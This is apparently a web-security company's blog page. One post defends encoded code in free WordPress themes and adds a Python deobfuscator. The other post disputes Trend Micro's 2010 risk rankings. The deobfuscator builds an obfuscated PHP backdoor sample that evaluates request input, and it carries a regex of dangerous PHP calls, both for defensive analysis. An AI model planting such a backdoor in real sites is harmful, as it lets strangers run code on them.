WeWatchYourWebsite

"so you don't have to!"


Why You Should Never Avoid Free WordPress Themes Just Because They’re Encoded

This might be a little on the controversial side, but as a security specialist, I believe that too often people are getting “hyped-up” over obfuscated code.

I recently read a blog post titled, “Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else” and while I commend the writer for researching this topic, I also felt compelled to write this rebuttal.

Too often people read that hackers use base64_decode in their infections, then search their sites for that string and become alarmists when they find it.

“Oh no! How did this happen to my site?”

“What do I do now?”

People – base64_decode is used in many, many legitimate ways as well.

Not to discredit the author of the original research, but I did want to provide further details from a security specialist's point of view.

I’ll dive into a few of the themes that were listed in the original post.

1. Downloading the PRiNZ Branford Magazine theme from WordPressthemesbase.com resulted in a zip file that required a password. Further investigation suggested this is a possible unauthorized copy of an older version of the theme. While this theme may be harmful to your website, we dropped our investigation of this one, as you can't open the copy downloaded from wordpressthemesbase.com anyway.

Result: BAD!!! If you want this theme, get it from http://www.der-prinz.com and pay the $40 – $45 and be done with it.

2. We downloaded the BeautyStore theme from http://www.freewordpressthemes.com and looked at the footer.php which was identified by the original poster as having “severe warnings”. Our deobfuscator showed us this in the footer.php:

(screenshot: the deobfuscated PHP code from footer.php)

Nothing malicious looking there. Appears to be typical footer type code.

Result: Safe. This is an example of not fully decoding or deobfuscating code and assuming it’s bad – this isn’t.

3. We downloaded a number of themes from the site: www.themes2wp.com, however out of 4 downloads, they were all empty. Not sure what was going on there.

Going by the original poster's research, you can remove the embedded links and have a nice theme. You can't assume that code using an eval statement is bad; eval appears in plenty of legitimate code.

4. I'll agree with the original poster on the themes downloaded from FreeWPThemes: they should be updated to conform with the WordPress 3.0 standards.

Result: I’d look for other themes that have been updated.

5. Obviously getting free WordPress themes from WordPress.org is going to be your safest option of them all.

Result: Go ahead and do it.

6. The FUNDA theme from themes.rock-kitty.net was downloaded and analyzed next.

In the original poster’s review of this theme, a number of eval(base64_decode strings were identified.

The first one we looked at was in the file: functions.php. It starts out:

This decoded to:

Again – safe.

Analyzing the other base64_decode strings in the functions.php file showed they were harmless as well. I will admit that there are links to various websites embedded in the base64-encoded strings, but they are harmless. If I were to make a suggestion to the people running the website we downloaded this theme from, it would be to stop using popular themes to build their backlinks.

The website themes.rock-kitty.net is registered to Artem Minaev. One of the links embedded in the base64_decode string is bestincellphones.com, a private domain registration, so we don't know who it belongs to, but someone at themes.rock-kitty.net is getting something out of embedding links. We downloaded the FUNDA theme from www.newwpthemes.com and found that it had none of the links or base64_decode calls, so we can only conclude that they were added at Rock-kitty.

Result: While maybe sneaky, the theme downloaded from Rock-kitty is safe, although I would download it from newwpthemes.com instead.

Closing: I’m not going to bore you with the details of the other themes. The point here is that you can’t just assume that since a theme, a widget or a plugin is using base64_decode, that it’s bad or malicious.
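As an added example, not code from the original post or from WeWatchYourWebsite, here is a decoder that does what the post argues for: it finds eval() calls wrapped in base64_decode, gzinflate, gzuncompress, str_rot13 or strrev, applies the layers innermost-first the way PHP would, follows eval layers nested inside decoded output, and then reports the embedded URLs and the constructs that deserve a human's attention, rather than stopping at the word base64_decode. The three PHP snippets it runs against are constructed here for the example; none is taken from any theme named above, and the URLs and wrapper combinations in them are placeholders.

```python
from __future__ import annotations

import base64
import codecs
import re
import zlib


def _deflate(data: bytes) -> bytes:
    """Raw DEFLATE, the inverse of PHP's gzinflate()."""
    comp = zlib.compressobj(wbits=-15)
    return comp.compress(data) + comp.flush()

def _rot13(data: bytes) -> bytes:
    return codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")

# Wrappers commonly stacked around an encoded payload in PHP themes: DECODERS is
# what PHP does when it evaluates them, ENCODERS the inverse, used here only to
# build the constructed samples at the bottom.
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b"".join(b.split())),
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
    "str_rot13": _rot13,
    "strrev": lambda b: b[::-1],
}
ENCODERS = {"base64_decode": base64.b64encode, "gzinflate": _deflate,
            "gzuncompress": zlib.compress, "str_rot13": _rot13, "strrev": lambda b: b[::-1]}

# eval( wrapper( wrapper( ... 'payload' ))) with a literal quoted payload.
EVAL_RE = re.compile(
    r"eval\s*\(\s*((?:(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(\s*)+)"
    r"(['\"])([^'\"]*)\2",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
# Constructs that make decoded code worth a second look. A hit is a prompt to
# read the code, not proof that it is malicious.
SUSPICIOUS_RE = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
    r"|\b(?:system|exec|shell_exec|passthru|create_function|assert|move_uploaded_file)\s*\("
    r"|\beval\s*\(\s*\$",
    re.IGNORECASE,
)

def unwrap(chain: str, payload: str) -> bytes:
    """Apply the wrapper chain innermost-first, as PHP would at run time."""
    names = re.findall(r"[a-z0-9_]+", chain, re.IGNORECASE)
    data = payload.encode("latin-1", "replace")
    for name in reversed(names):
        data = DECODERS[name.lower()](data)
    return data

def decode_all(source: str, max_depth: int = 8) -> list[str]:
    """Every decoded payload in source, following eval layers nested in others."""
    found: list[str] = []
    pending = [(source, 0)]
    while pending:
        text, depth = pending.pop()
        for match in EVAL_RE.finditer(text):
            try:
                decoded = unwrap(match.group(1), match.group(3)).decode("latin-1")
            except (ValueError, zlib.error):
                continue  # not a layer these decoders handle; review it by hand
            found.append(decoded)
            if depth + 1 < max_depth:
                pending.append((decoded, depth + 1))
    return found

def assess(decoded: str) -> dict:
    """What the decoded code contains, so a person can judge it instead of guessing."""
    return {
        "urls": sorted(set(URL_RE.findall(decoded))),
        "suspicious": sorted({m.group(0) for m in SUSPICIOUS_RE.finditer(decoded)}),
    }

def review(source: str) -> list[dict]:
    return [{"decoded": d, **assess(d)} for d in decode_all(source)]

def wrap_for_eval(plain: str, wrappers: list[str]) -> str:
    """Build eval(w1(w2('...'))) around plain; list wrappers outermost first."""
    data = plain.encode("latin-1")
    for name in wrappers:  # the outer wrapper's inverse is applied first
        data = ENCODERS[name](data)
    payload = data.decode("latin-1")
    opening = "".join(f"{w}(" for w in wrappers)
    return f"eval({opening}'{payload}'{')' * len(wrappers)});"

# Constructed samples (not from any theme named in the post; URLs are placeholders).
HARMLESS_FOOTER = "<?php " + wrap_for_eval(  # credit links plus one backlink
    '<div id="footer">Powered by <a href="http://wordpress.org/">WordPress</a>. '
    'Theme by <a href="http://example.com/">Example</a></div>', ["gzinflate", "base64_decode"]) + " ?>"
BACKDOOR = "<?php " + wrap_for_eval(  # runs whatever arrives in a request parameter
    "if (isset($_REQUEST['c'])) { eval($_REQUEST['c']); }", ["str_rot13", "base64_decode"]) + " ?>"
NESTED = "<?php " + wrap_for_eval(  # an eval layer hidden inside another
    wrap_for_eval('<a href="http://example.org/">x</a>', ["base64_decode"]), ["base64_decode"]) + " ?>"

if __name__ == "__main__":
    for label, src in (("footer", HARMLESS_FOOTER), ("backdoor", BACKDOOR), ("nested", NESTED)):
        for hit in review(src):
            print(f"[{label}] urls={hit['urls']} suspicious={hit['suspicious']}\n    {hit['decoded']}")
```

Treat the output as something to read, not as a verdict. The footer sample decodes to credit-link markup with a backlink, which is the "sneaky but safe" case the post describes; the second sample decodes to code that executes whatever arrives in a request parameter, which no footer needs. Payloads the decoders cannot handle (a wrapper not in the table, a string assembled by concatenation) are skipped rather than guessed at and should be reviewed by hand.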

I do give an “up-top”, as my wife would say, to the original poster for the research, but I would declare many of the themes safe.

If there’s a theme you want analyzed by us, send me an email or post a comment here with the website link and we’ll download it, analyze it and report on it. If this becomes a real popular topic, we’ll create a free analyzer and post it on our website.

Thank you for reading this far. Let’s be safe out there, but not make false accusations of harmless themes.


What were the greatest risks online in 2010?

While I was reading Trend Micro’s blog (http://blog.trendmicro.com/2010s-most-dangerous-list/) I felt compelled to share it with our readers and give you my comments on it as well.

I’ll skip the hardware section as I’m sure not many of us use the German Identification card reader.

The first section I’ll comment on is Website Software. Here they list WordPress as the riskiest software used by websites in 2010. Is it really the riskiest? Or are the unpatched, non-updated sites the riskiest?

Trend Micro’s blog does state that tens of thousands of unpatched WordPress blogs were used by cybercriminals. So they do differentiate there. But as far as I’m concerned, there is other website software that is a greater risk than WordPress. At least WordPress is patched on a continual basis.

Something like osCommerce might be riskier. It hadn't been updated in a while, and because it's used for ecommerce, hackers have more to gain by infecting osCommerce sites than a blog, don't you agree? Wouldn't stolen credit cards be a greater risk than an infected blog?

I know that quite often the hackers are after infecting PCs, and the best way of accomplishing that is through the browser via websites, but if they can get into a frequently used ecommerce site and just steal the information there, they don't even have to worry about circumventing the anti-virus protection on a PC.

Granted, there are probably more outdated WordPress blogs than there are vulnerable ecommerce sites, but is that really riskier?

The next category in the Trend Micro blog was IP (Internet Protocol). Here they list Internet Relay Chat (IRC) as the riskiest protocol. Again, I don’t totally disagree with them, but their reason is that 30% of all botnets used IRC to communicate with infected machines. Does that make it a greater risk?

Is IRC something that should be blocked by most firewalls? I believe so. But to classify it as the riskiest IP, I'm not sure I buy into that. If you go with their logic for listing WordPress as the riskiest software because it's used most often by hackers, then why isn't HTTP the riskiest IP? That's how most infections happen: through infected websites.

This next category is sure to get a rise out of my friend Danny and my brother-in-law.

The riskiest operating system, according to Trend Micro’s research was…Apple’s Mac OS X. Again, as much as I’d like to jump up and cheer at the top of my lungs, it just isn’t going to happen.

While I agree that many Mac users feel they're impervious to infectious websites because "I have a Mac", and that this thinking alone makes many of them more prone to infection, I can't agree that this is the riskiest operating system.

I enjoy my canned response when someone with a Mac tells me they never worry about viruses since they have a Mac. I reply with, “Without any way of detecting it (since rarely do they have an anti-virus installed on their Macs) how do you know?”

That’s just me being me. But I still can’t agree with Trend Micro.

My last disagreement with them is their pick for the most infectious website – Google.

What?

The rulers of the Internet (I say that with the utmost respect for Google) are the most infectious website? I don't agree. Trend Micro's research states that "Its tremendous popularity led cybercriminals to target it specifically for blackhat SEO-related schemes…"

Just because you’re popular and used by cybercriminals for their nefarious schemes doesn’t make you risky. With that thinking in mind, I might list the Detroit Redwings website as the riskiest.

Do we need more Redwings fans? I think not! (This is totally based on my lifelong love affair with the Blackhawks and nothing more.)

The last category I’ll comment on is Social Network. Trend Micro’s research lists Facebook. They say, “Facebook could be considered the most dangerous social networking site around.”

Here, I agree. Think of how much time is wasted by people snooping into other people's lives. Think of how much time people spend on Farmville. What if we got everyone to focus on a cure for cancer during the time they usually spend playing Farmville?

Come on, let’s rally the troops here and cure cancer.

Next, for a special certain someone, we’ll knock out AIDS – worldwide. (That would prevent a trip to Africa.)

After AIDS, we'll cure ALS. All this with the time spent playing Farmville. After ALS we'll have to cure racism, prejudice and hatred, just to make it a perfect world.

Now I realize that many aren't going to agree with my disagreements, but that's the beauty of the Internet. You can voice your opinion and in the end we can agree to disagree.

What’s your opinion?

Please share it.

Thank you.